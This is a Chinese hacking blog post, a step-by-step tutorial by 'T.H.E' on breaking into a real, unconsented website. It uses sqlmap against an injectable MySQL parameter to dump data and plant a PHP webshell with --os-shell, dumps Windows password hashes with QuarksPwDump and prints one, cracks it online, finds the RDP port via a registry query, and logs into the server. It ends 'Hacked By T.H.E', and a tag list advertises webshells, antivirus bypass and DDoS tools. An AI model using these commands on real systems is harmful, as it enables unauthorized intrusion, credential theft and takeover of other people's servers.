WEBSHELL

今天是

关于我联系我网站地图

现在位置:首页 » 入侵笔记 » win环境下使用sqlmap写shell + MYSQL提权(默认就是system权限)

win环境下使用sqlmap写shell + MYSQL提权(默认就是system权限)
作者:T.H.E   分类:入侵笔记   评论(10)   浏览(22254)   关键词: 渗透教程

今天在来一个mysql提权 (也可以说是默认system权限提的)

在被黑站点找到一个站   1.gif

先教拿shell

是有注入漏洞的 有可能是root权限的注入点

QQ截图20140803120233.gif

QQ截图20140803120351.gif

可以确定是有注入漏洞的 也得到了 物理路径 这个是很有用的 如果是root权限的注入点 那我们可以考虑 写shell

D:\wamp\www\js\content.php 有时候物理路径是很有用的

上sqlmap注入 使用命令 这个是mysql数据库的


sqlmap.py -u 注入点 --current-user # /*获取当前用户名称
sqlmap.py -u 注入点 --current-db  #  /*获取当前数据库名称
sqlmap.py -u 注入点 -D "数据库名" -T "表名" --tables
sqlmap.py -u 注入点 -D "数据库名" -T "表名" --columns
sqlmap.py -u 注入点 -D "数据库名" -T "表名" -C "字段" --dump
sqlmap.py -u 注入点 --file-read "文件名"#读取文件load_file()
sqlmap.py -u 注入点 --is-dba #是否是数据库管理员
sqlmap.py -u 注入点 --passwords #数据库用户密码

这个是win环境的安装的sqlmap 不是linux环境安装的 使用方法 多了(.py)

好了 看一下是什么权限注入点

sqlmap.py -u 注入点 --current-user # /*获取当前用户名称


QQ截图20140803122722.gif

如图 我们看到了是什么环境 win + 阿帕奇 注入点是root权限

current user:    'root@localhost'

好了 知道是什么权限了 现在就来写shell 写shell前提条件 (1.必须是root权限 2.必须知道网站路径 3.GPC设置为off 就可以写shell了)

以上3个我们都达到了 至于第三个 因为php默认GPC设置都是为off

D:\wamp\www\js\content.php 物理路径 继续

命令

sqlmap.py -u 注入点 --os-shell

如图

QQ截图20140803123612.gif

这里 它让你选择木马脚本 这里我们都是用第3个

QQ截图20140803123715.gif


QQ截图20140803123841.gif

确认提下两下 刚刚得到的路径D:\wamp\www\js\

之后回车

QQ截图20140803124114.gif

得到了一个shell  js\tmpuyqwq.php

QQ截图20140803124239.gif

shell 拿到了 现在就是提权了 我有个习惯就是php提权的时候 每次都会使用一下自带的执行命令 

QQ图片20140803124450.jpg

我运气太好了 呵呵 当然也可以用mysql提也就是udf (版本5.0的默认导出dll就可以)

好了现在就是添加用户 或者抓哈希值 (我就不提交用户了 抓个哈希值)

使用国外神器 QuarksPwDump.exe 使用命令

路径\quarkspwdump.exe --dump-hash-local --output 路径\1.txt

QQ截图20140803115133.gif

好了得到 1.txt 也就是哈希值文本

QQ截图20140803115204.gif

得到这个 然后复制 14EFBCC05C9817DBAAD3B435B51404EE:D8BB76D4A8CE4E34810C1BB045697B45

去http://www.objectif-securite.ch/ophcrack.php这个 网站破解.

QQ截图20140803115253.gif

得到明文 现在就是找一下远程端口 在此教一个快速找远程端口的方法

使用dos命令 

查看终端命令:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

QQ截图20140803115327.gif

得到这个 0xd3d 有基础的一点知道 就是默认10进制的3389 也就是默认远程端口 

不知道也没关系 

如图:

QQ截图20140803115406.gif

ok 3389   登录服务器看看

QQ截图20140803115528.gif

到此 教程完毕   转载的朋友请联系作者id


Hacked By T.H.E






    转载分享请注明原文地址(WEBSHELL):https://www.webshell.ren/post-8.html
分享本文至:

发表评论:

NiceWell [回复该留言]
2014-12-16 03:11
我这里 就没成功过,感觉是因为版本问题, 求 楼主 这个版本的sqlmap  我也是在win平台下的。
T.H.E
[回复该留言]
2014-12-16 09:27
@NiceWell:自己安装   别用集成版本的
虽然不懂楼主在说什么,但看起来貌似很厉害的样子
T.H.E
[回复该留言]
2014-11-26 16:04
@微型球磨机:谢谢支持
球磨机
[回复该留言]
2014-11-04 18:16
虽然不懂楼主在说什么,但看起来貌似很厉害的样子
T.H.E
[回复该留言]
2014-11-04 20:22
@球磨机:我去
过程还是十分精彩的,
T.H.E
[回复该留言]
2014-08-21 13:06
@猫客工作室:呵呵
I LOVE THE [回复该留言]
2014-08-03 13:17
教程强大!支持博主!
T.H.E
[回复该留言]
2014-08-03 15:55
@I LOVE THE:嗯嗯

标签

  • 过狗总结
  • 免费资源
  • cms漏洞
  • 纯属扯淡
  • 渗透工具
  • 系统漏洞
  • 编辑器漏洞
  • 渗透教程
  • 提权exp分享
  • 站长资讯
  • 提权教程
  • 旁站工具
  • 一句话脚本
  • iis6写权限和遍历修复
  • 启动项目提权
  • 本人消失一段时间
  • asp大马后门
  • 搜狗问问存储型XSS
  • 批量discuz
  • 最新过狗菜刀
  • 7.2
  • 免杀pr
  • php读取iis配置脚本
  • 过安全宝
  • phpweb拿shell突破安全狗
  • Drupal
  • 实战某学校内网渗透
  • 7.31爆严重SQL注入漏洞【附exp】
  • 星外提权
  • windows
  • boot
  • manager
  • .htaccess
  • 301重定向
  • 免杀提权exp整理
  • 分享字典
  • 内网端口转发
  • 编辑器插一句话
  • wdcp虚拟主机管理系统
  • 过狗大马
  • CVE-2014-6332
  • 免费cdn加速
  • 附上exp
  • windows创建隐藏帐号
  • 指定渗透某大学
  • XYCMS漏洞整理
  • 内网渗透
  • emlog相册插件漏洞
  • 校园系统cms漏洞
  • Alan社工教程
  • 说明
  • pigcms&iwxcms漏洞利用工具
  • 批量上传黑页
  • IISPutScanner增强版
  • cc攻击防御
  • 椰树V1.9接口修复版
  • CVE-2014-3153
  • EXP
  • 搜索引擎分别CDN加速
  • MSSQL数据库提权
  • 新C段查询工具
  • 利用Apache解析漏洞拿下单子站
  • 内网渗透系列教程整理(原创)
  • 第一章节:讲解内网转发(原创)
  • sqlmap基本使用方法
  • 实战社工系列教程
  • cms漏洞集合
  • DDoS攻击
  • 12306信息泄密事件
  • 第二章节:内网域渗透(原创)
  • DDOS工具
  • wordpress上传漏洞
  • 支付宝自动转账支付代码
  • 突破SecureRDP拦截
  • 内网渗透第三章节1小节(原创)
  • 知名安全检测工具AWVSv9.5更新破解版本
  • 内网渗透第三章节0x2小节
  • 8.1权限提升漏洞POC
  • 渗透系列视频教程
  • 木马爆破工具集合
  • 记一次上传拿shell
  • 最新提星外主机系统思路(原创)
  • 过守护神总结
  • 对母校官方网站的一次渗透检测经历
  • 帝国CMS
  • 74CMS
  • 社会工程学系列
  • 文字语音调用代码
  • 法克论坛旁站查询工具
  • 数据泄露那些事情
  • Bitstamp
  • 翻墙网站
  • 黑掉ATM
  • aspcmsCSRF漏洞利用代码
  • 绕过各种CDN防护总结
  • 轻量级网站漏洞批量扫描器
  • 隐匿在Pastebin上的后门
  • 学校渗透系列一
  • ISIS黑客
  • SniffPass
  • -
  • 网络密码嗅探
  • 黑客组织“匿名者”
  • 谷歌把微软惹毛了
  • iPod
  • nano竟成ATM盗窃工具
  • 恶意软件可绕过密码
  • 马化腾QQ也曾被盗
  • 铁通被曝系统漏洞
  • Windows8.1漏洞
  • 白帽子借漏洞1元买几十万Model
  • Notepad++官网被圣战组织黑了
  • 苹果OSX的Spotlight文件搜索含泄漏用户隐私漏洞
  • 2014十大木马
  • 免费cdn加速整理
  • 韩国航空Facebook
  • Discuz!
  • X1.5前台getshell漏洞
  • 斯诺登又曝新料
  • 《英雄联盟》被曝植入木马
  • 2014年全球十大网络攻击事件
  • PolarSSL
  • 劫持301重定向快照流量
  • 过D盾的思路
  • 指定网站入侵
  • 比特币
  • 安全漏洞资讯
  • 黑客攻击
  • 自动批量SHELL一条龙
  • 域名爆破+Host查询
  • 黑客组织Anonymous
  • Burp
  • Suite
  • WordPress网站漏洞
  • 河马工具
  • kali系列教程
  • 网络资讯
  • MS15-077
  • MS15-051
  • 黑客交易吧2003渗透系统
  • 对国外黑客批量爆菊花
  • joomla反序列化漏洞
  • Dedecms延时注入漏洞
  • https
  • 安全狗
  • Nmap使用教程
  • linux
  • 工具收集
  • 腾讯安全网址拦截
  • 菜刀后门解析
    • 全球访问统计

        Free counters!
    • <-----------------------------------------------分界线----------------------------------------------->